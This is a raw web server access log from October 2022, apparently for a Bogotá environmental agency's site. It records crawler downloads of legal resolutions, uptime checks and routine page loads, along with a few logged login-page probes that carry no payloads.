207.46.13.84 - - [02/Oct/2022:13:52:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000854.tif HTTP/1.1" 200 50196
216.245.221.92 - - [02/Oct/2022:13:52:57 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.13 - - [02/Oct/2022:13:53:21 -0500] "-" 408 -
201.245.192.253 - - [02/Oct/2022:13:54:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:13:52:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.87.10 - - [02/Oct/2022:13:54:59 -0500] "GET /images/pieza-mujeres-reverdecen-4-abril.jpg HTTP/1.1" 200 48916
172.22.2.4 - - [02/Oct/2022:13:53:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.202 - - [02/Oct/2022:13:56:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/2819.tif HTTP/1.1" 200 32584
216.245.221.92 - - [02/Oct/2022:13:57:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:13:59:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
173.252.95.15 - - [02/Oct/2022:14:00:06 -0500] "GET /calidad-del-aire-de-bogota-en-condiciones-moderadas-y-regulares.html HTTP/1.1" 206 898
173.252.79.12 - - [02/Oct/2022:14:00:06 -0500] "GET /images/pieza-calidad-aire-noche-4-febrero.jpg HTTP/1.1" 200 37476
172.22.2.4 - - [02/Oct/2022:13:58:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:13:59:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
207.46.13.190 - - [02/Oct/2022:14:02:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0627.pdf HTTP/1.1" 200 333207
216.245.221.92 - - [02/Oct/2022:14:02:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:14:04:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:14:04:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:05:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
199.59.150.181 - - [02/Oct/2022:14:07:56 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [02/Oct/2022:14:07:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:14:09:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
185.119.81.109 - - [02/Oct/2022:14:09:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:14:09:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
64.124.8.49 - - [02/Oct/2022:14:11:14 -0500] "-" 408 -
207.46.13.190 - - [02/Oct/2022:14:12:07 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 165994
172.22.2.4 - - [02/Oct/2022:14:10:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:12:24 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
216.245.221.92 - - [02/Oct/2022:14:12:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:11:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [02/Oct/2022:14:14:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
64.124.8.49 - - [02/Oct/2022:14:14:34 -0500] "-" 408 -
207.46.13.84 - - [02/Oct/2022:14:13:08 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63207
207.46.13.84 - - [02/Oct/2022:14:14:59 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
207.46.13.84 - - [02/Oct/2022:14:15:00 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
207.46.13.84 - - [02/Oct/2022:14:15:00 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
207.46.13.40 - - [02/Oct/2022:14:15:03 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
64.124.8.49 - - [02/Oct/2022:14:16:49 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:14:17:57 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.109 - - [02/Oct/2022:14:17:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [02/Oct/2022:14:17:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [02/Oct/2022:14:16:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.49 - - [02/Oct/2022:14:18:07 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:14:17:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [02/Oct/2022:14:19:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
207.46.13.89 - - [02/Oct/2022:14:20:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0953.pdf HTTP/1.1" 200 350341
201.245.192.253 - - [02/Oct/2022:14:21:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44176
201.245.192.253 - - [02/Oct/2022:14:21:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44958
64.124.8.49 - - [02/Oct/2022:14:21:58 -0500] "-" 408 -
64.124.8.49 - - [02/Oct/2022:14:22:38 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:14:22:45 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [02/Oct/2022:14:22:46 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
216.245.221.92 - - [02/Oct/2022:14:22:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:22:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:14:24:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:14:22:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
157.55.39.154 - - [02/Oct/2022:14:24:43 -0500] "GET /alcaldia-de-bogota-y-gobernacion-de-cundinamarca-suscriben-convenio-para-implementar-pagos-por-servicios-ambientales-en-la-bogota-region.html HTTP/1.1" 200 1133
172.22.2.4 - - [02/Oct/2022:14:23:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
207.46.13.40 - - [02/Oct/2022:14:26:30 -0500] "GET /BLA/resoluciones/AUTOS%202011/0720.pdf HTTP/1.1" 304 -
64.124.8.48 - - [02/Oct/2022:14:26:49 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:14:27:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.89 - - [02/Oct/2022:14:28:21 -0500] "GET /BLA/resoluciones/AUTOS%202013/3416.pdf HTTP/1.1" 200 703593
201.245.192.253 - - [02/Oct/2022:14:29:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:14:27:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:28:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
207.46.13.40 - - [02/Oct/2022:14:31:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20900-949.tif HTTP/1.1" 200 4091182
186.86.32.105 - - [02/Oct/2022:14:31:35 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.86.32.105 - - [02/Oct/2022:14:31:35 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.86.32.105 - - [02/Oct/2022:14:31:35 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.86.32.105 - - [02/Oct/2022:14:31:35 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.86.32.105 - - [02/Oct/2022:14:31:35 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
201.245.192.253 - - [02/Oct/2022:14:31:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44176
186.86.32.105 - - [02/Oct/2022:14:31:46 -0500] "POST /appsia/controlador HTTP/1.1" 200 3599
186.86.32.105 - - [02/Oct/2022:14:31:46 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
201.245.192.253 - - [02/Oct/2022:14:31:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44958
181.48.255.70 - - [02/Oct/2022:14:31:49 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.48.255.70 - - [02/Oct/2022:14:31:50 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.48.255.70 - - [02/Oct/2022:14:31:50 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.48.255.70 - - [02/Oct/2022:14:31:50 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.48.255.70 - - [02/Oct/2022:14:31:50 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.86.32.105 - - [02/Oct/2022:14:32:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
216.245.221.92 - - [02/Oct/2022:14:32:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:14:34:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
66.220.149.5 - - [02/Oct/2022:14:34:45 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
207.46.13.190 - - [02/Oct/2022:14:35:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/3454.pdf HTTP/1.1" 200 430726
172.22.2.4 - - [02/Oct/2022:14:33:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.40 - - [02/Oct/2022:14:35:35 -0500] "GET /BLA/resoluciones/00001061.tif HTTP/1.1" 404 1018
172.22.2.4 - - [02/Oct/2022:14:34:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
64.124.8.49 - - [02/Oct/2022:14:37:13 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:14:37:57 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.49 - - [02/Oct/2022:14:37:59 -0500] "-" 408 -
207.46.13.190 - - [02/Oct/2022:14:37:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%20351-400/00000361.tif HTTP/1.1" 200 471536
201.245.192.253 - - [02/Oct/2022:14:39:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:14:40:50 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [02/Oct/2022:14:39:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.49 - - [02/Oct/2022:14:41:39 -0500] "-" 408 -
207.46.13.190 - - [02/Oct/2022:14:41:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202300-2349.tif HTTP/1.1" 200 4577676
201.245.192.253 - - [02/Oct/2022:14:41:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44176
201.245.192.253 - - [02/Oct/2022:14:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44958
172.22.2.4 - - [02/Oct/2022:14:40:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
216.245.221.92 - - [02/Oct/2022:14:42:57 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.49 - - [02/Oct/2022:14:43:11 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:14:43:46 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 262144
201.245.192.253 - - [02/Oct/2022:14:44:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
64.124.8.49 - - [02/Oct/2022:14:44:58 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:14:45:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.49 - - [02/Oct/2022:14:47:11 -0500] "-" 408 -
207.46.13.190 - - [02/Oct/2022:14:47:50 -0500] "GET /BLA/resoluciones/00000876.tif HTTP/1.1" 404 1018
216.245.221.92 - - [02/Oct/2022:14:47:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:46:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
64.124.8.48 - - [02/Oct/2022:14:48:42 -0500] "-" 408 -
201.245.192.253 - - [02/Oct/2022:14:49:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:14:49:24 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [02/Oct/2022:14:49:24 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [02/Oct/2022:14:49:24 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [02/Oct/2022:14:49:24 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Oct/2022:14:49:29 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
186.29.188.121 - - [02/Oct/2022:14:49:31 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.29.188.121 - - [02/Oct/2022:14:49:32 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.29.188.121 - - [02/Oct/2022:14:49:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.29.188.121 - - [02/Oct/2022:14:49:32 -0500] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1120
186.29.188.121 - - [02/Oct/2022:14:49:32 -0500] "GET /apple-touch-icon.png HTTP/1.1" 404 1120
186.29.188.121 - - [02/Oct/2022:14:49:39 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.29.188.121 - - [02/Oct/2022:14:49:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 325102
64.124.8.49 - - [02/Oct/2022:14:49:40 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:14:49:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
66.249.64.15 - - [02/Oct/2022:14:50:48 -0500] "-" 408 -
64.124.8.49 - - [02/Oct/2022:14:51:38 -0500] "-" 408 -
186.145.91.172 - - [02/Oct/2022:14:51:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.145.91.172 - - [02/Oct/2022:14:51:53 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.145.91.172 - - [02/Oct/2022:14:51:53 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.145.91.172 - - [02/Oct/2022:14:51:53 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.145.91.172 - - [02/Oct/2022:14:51:54 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.145.91.172 - - [02/Oct/2022:14:52:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 170086
186.145.91.172 - - [02/Oct/2022:14:52:01 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.145.91.172 - - [02/Oct/2022:14:52:01 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.145.91.172 - - [02/Oct/2022:14:52:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2882.pdf HTTP/1.1" 200 371140
186.145.91.172 - - [02/Oct/2022:14:52:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2882.pdf HTTP/1.1" 200 371140
186.145.91.172 - - [02/Oct/2022:14:52:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2874.pdf HTTP/1.1" 200 395510
216.245.221.92 - - [02/Oct/2022:14:52:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:51:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:14:52:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
186.116.212.195 - - [02/Oct/2022:14:54:07 -0500] "GET /forest/ HTTP/1.1" 200 12041
186.116.212.195 - - [02/Oct/2022:14:54:13 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
46.19.141.122 - - [02/Oct/2022:14:54:06 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
201.245.192.253 - - [02/Oct/2022:14:54:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
64.124.8.49 - - [02/Oct/2022:14:55:08 -0500] "-" 408 -
186.145.91.172 - - [02/Oct/2022:14:56:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2840.pdf HTTP/1.1" 200 404753
64.124.8.49 - - [02/Oct/2022:14:57:41 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:14:57:57 -0500] "HEAD / HTTP/1.1" 200 -
186.145.91.172 - - [02/Oct/2022:14:58:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2884.pdf HTTP/1.1" 200 445627
186.145.91.172 - - [02/Oct/2022:14:58:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2884.pdf HTTP/1.1" 200 445627
186.145.91.172 - - [02/Oct/2022:14:58:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2895.pdf HTTP/1.1" 200 431819
64.124.8.49 - - [02/Oct/2022:14:58:43 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:14:57:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.59.150.181 - - [02/Oct/2022:14:58:51 -0500] "GET /images/feria-veh%C3%ADculos-sostenibles_optimized.jpeg HTTP/1.1" 404 1034
186.145.91.172 - - [02/Oct/2022:14:59:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3419.pdf HTTP/1.1" 200 1642737
201.245.192.253 - - [02/Oct/2022:14:59:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:14:57:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
157.55.39.25 - - [02/Oct/2022:15:00:27 -0500] "GET /BLA/resoluciones/AUTOS%202022/1313.pdf HTTP/1.1" 304 -
186.145.91.172 - - [02/Oct/2022:15:01:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3422.pdf HTTP/1.1" 200 1641854
186.145.91.172 - - [02/Oct/2022:15:01:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3604.pdf HTTP/1.1" 200 520793
64.124.8.49 - - [02/Oct/2022:15:01:45 -0500] "-" 408 -
186.145.91.172 - - [02/Oct/2022:15:01:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3922.pdf HTTP/1.1" 200 5739850
185.119.81.101 - - [02/Oct/2022:15:02:18 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [02/Oct/2022:15:02:19 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [02/Oct/2022:15:02:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:15:03:46 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [02/Oct/2022:15:04:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
201.245.192.253 - - [02/Oct/2022:15:04:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
172.22.2.4 - - [02/Oct/2022:15:04:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [02/Oct/2022:15:04:16 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
186.80.52.211 - - [02/Oct/2022:15:04:18 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.80.52.211 - - [02/Oct/2022:15:04:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394468
172.22.2.4 - - [02/Oct/2022:15:02:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:15:03:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53290
172.22.2.4 - - [02/Oct/2022:15:04:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
64.124.8.49 - - [02/Oct/2022:15:06:03 -0500] "-" 408 -
34.147.73.83 - - [02/Oct/2022:15:07:46 -0500] "GET / HTTP/1.1" 200 319
34.147.73.83 - - [02/Oct/2022:15:07:46 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [02/Oct/2022:15:07:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:15:09:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
66.249.64.13 - - [02/Oct/2022:15:09:18 -0500] "-" 408 -
64.124.8.49 - - [02/Oct/2022:15:10:19 -0500] "-" 408 -
172.22.2.4 - - [02/Oct/2022:15:08:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Oct/2022:15:09:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
64.124.8.49 - - [02/Oct/2022:15:11:44 -0500] "-" 408 -
64.124.8.49 - - [02/Oct/2022:15:12:39 -0500] "-" 408 -
216.245.221.92 - - [02/Oct/2022:15:12:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Oct/2022:15:14:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43876
45.238.183.254 - - [02/Oct/2022:15:15:32 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.238.183.254 - - [02/Oct/2022:15:15:32 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.238.183.254 - - [02/Oct/2022:15:15:32 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
45.238.183.254 - - [02/Oct/2022:15:16:03 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
45.238.183.254 - - [02/Oct/2022:15:16:04 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
45.238.183.254 - - [02/Oct/2022:15:16:04 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
45.238.183.254 - - [02/Oct/2022:15:16:05 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
45.238.183.254 - - [02/Oct/2022:15:16:07 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
45.238.183.254 - - [02/Oct/2022:15:16:10 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
45.238.183.254 - - [02/Oct/2022:15:16:10 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
45.238.183.254 - - [02/Oct/2022:15:16:11 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
45.238.183.254 - - [02/Oct/2022:15:16:11 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
45.238.183.254 - - [02/Oct/2022:15:16:12 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
45.238.183.254 - - [02/Oct/2022:15:16:13 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
45.238.183.254 - - [02/Oct/2022:15:16:13 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
45.238.183.254 - - [02/Oct/2022:15:16:13 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
45.238.183.254 - - [02/Oct/2022:15:16:14 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
45.238.183.254 - - [02/Oct/2022:15:16:14 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
45.238.183.254 - - [02/Oct/2022:15:16:15 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
45.238.183.254 - - [02/Oct/2022:15:16:15 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
45.238.183.254 - - [02/Oct/2022:15:16:16 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
172.22.2.4 - - [02/Oct/2022:15:14:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.238.183.254 - - [02/Oct/2022:15:16:27 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
45.238.183.254 - - [02/Oct/2022:15:16:27 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
23.100.232.233 - - [02/Oct/2022:15:17:03 -0500] "GET /bla/resoluciones/resoluciones%202021/3730.pdf HTTP/1.1" 200 345152
172.22.2.4 - - [02/Oct/2022:15:15:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
